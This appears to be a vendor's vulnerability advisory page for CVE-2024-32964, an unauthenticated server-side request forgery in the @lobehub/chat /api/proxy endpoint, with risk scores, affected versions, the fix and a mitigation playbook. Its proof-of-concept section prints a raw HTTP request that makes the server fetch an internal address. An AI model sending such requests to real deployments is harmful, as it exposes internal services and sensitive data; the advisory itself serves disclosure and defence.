NIST deprecates RSA-2048 from 2030. Find every one of them before attackers do.
📦
📦 npm
Not in CISA KEV
CRITICAL severity

CVE-2024-32964 — @lobehub/chat

CRITICALFix: lobehub/lobe-chat@465665a

CVE-2024-32964 is a critical-severity (CVSS 9) Server-Side Request Forgery (SSRF) vulnerability in @lobehub/chat. EPSS puts its 30-day exploitation probability at 53.0% (99th percentile). A fix is available for @lobehub/chat — see the affected versions and patch details below.

lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability

Also known asGHSA-mxhq-xw3g-rphc
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Oct 26, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.

Exploitation and automatability from CISA’s SSVC triage for CVE-2024-32964.

EPSS Exploitation Probability

via FIRST.org ↗
53.0%probability of exploitation in next 30 days
High Risk0.00%
Lower risk than most CVEs99th percentile — riskier than 99% of all scored CVEsHighest risk
46.2%57.7%69.1%80.6%71.2%53.0%Apr 26Aug 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

Where this sits among everything scored

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

0other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
@lobehub/chatnpm
15Kdownloads / week

Description

Summary

The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

Details

image

image

image

PoC

POST /api/proxy HTTP/2
Host: xxxxxxxxxxxxxxxxx
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0
Content-Length: 23
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/agent
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7

http://172.23.0.1:8000/

Impact

SSRF ,All users will be impacted.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@lobehub/chatall versions0.150.6npm install @lobehub/chat@0.150.6

Affected Products

1 product · 1 configurations
Application
lobe chatlobehub
< 0.150.6
range

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @lobehub/chat, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update @lobehub/chat to 0.150.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2024-32964 is resolved across your whole dependency graph.

  3. Workarounds

    Restrict outbound requests from the affected component to an allowlist of hosts, block access to link-local and internal address ranges at the network layer, and require authentication on internal services so a forged request cannot reach them unauthenticated.

How to detect CVE-2024-32964

A community-maintained Nuclei template exists for this CVE. You can scan for it directly:

nuclei -id cve-2024-32964 -u https://target
Template
Lobe Chat <= v0.150.5 - Server-Side Request Forgery
Severity
critical
Impact
Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services and sensitive data.
Remediation
Update Lobe Chat to version 0.150.6 or later.

Template by ProjectDiscovery nuclei-templates (s4e-io), MIT licensed. View the full template. Scan only systems you are authorised to test.

Frequently Asked Questions

### Summary The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information. ### Details * visit https://chat-preview.lobehub.com/settings/agent * you can attack all internal services by /api/proxy and get the echo in http response :) ![image](https://github.com/lobehub/lobe-chat/assets/55245002/c2894c34-7333-4ae1-864c-3b212b95eb21) ![image](https://github.com/lobehub/lobe-chat/assets/55245002/dd9ad696-7180-4700-8bff-1171a6a8ac91
O3 Security · Impact-Aware SCA

Is CVE-2024-32964 in your dependencies?

Find it across npm, including transitive dependencies.

CVE-2024-32964: @lobehub/chat SSRF — Fixed in 0.150.6